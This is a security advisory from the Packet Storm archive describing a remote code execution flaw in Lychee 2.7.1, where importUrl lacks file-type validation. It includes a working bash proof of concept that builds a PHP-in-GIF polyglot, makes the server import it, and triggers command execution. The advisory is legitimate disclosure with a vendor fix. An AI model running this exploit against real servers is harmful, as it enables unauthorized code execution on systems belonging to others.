exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lychee 2.7.1 Remote Code Execution

Lychee 2.7.1 Remote Code Execution
Posted Apr 19, 2015
Authored by Filippo Cavallarin

Lychee version 2.7.1 suffers from a remote code execution vulnerability when logged in as an administrator.

tags | exploit, remote, code execution
SHA-256 | 838f6b6bb47ee54cd93284f806f636dbf53c9df7899e9dd5db885f98f9535dc9

Lychee 2.7.1 Remote Code Execution

Change Mirror Download
Advisory ID: SGMA15-002
Title: Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vendor: lychee.electerious.com
Vulnerability type: Remote Code Execution
Risk level: High
Credit: Filippo Cavallarin - segment.technology
CVE: N/A
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15


Details

Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability.

The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension validation.
Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution can be achieved.

Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a
specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged as administrator.

The following proof of concept demostrates the issue

#!/bin/bash

LYCHEE_HOST="lychee.local"
PHPSESSID="e0ac560kmqf0lli9u5jd20qt46"
LOCALIP="172.16.85.1"
CMD="uname -a"

cd /tmp || exit 1

echo "Creating gif..."
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>"
echo -e $GIF > gif.php

echo "Starting local webserver"
python -m SimpleHTTPServer > /dev/null 2>&1 &

sleep 1

echo "Starting the import procedure"
curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID" --data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"

sleep 5

kill %1
rm gif.php

echo "Executing command.."
curl "http://$LYCHEE_HOST/data/gif.php"

#EOF


Solution

Upgrade to Lychee version 2.7.2


References
http://lychee.electerious.com




Filippo Cavallarin
https://segment.technology/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close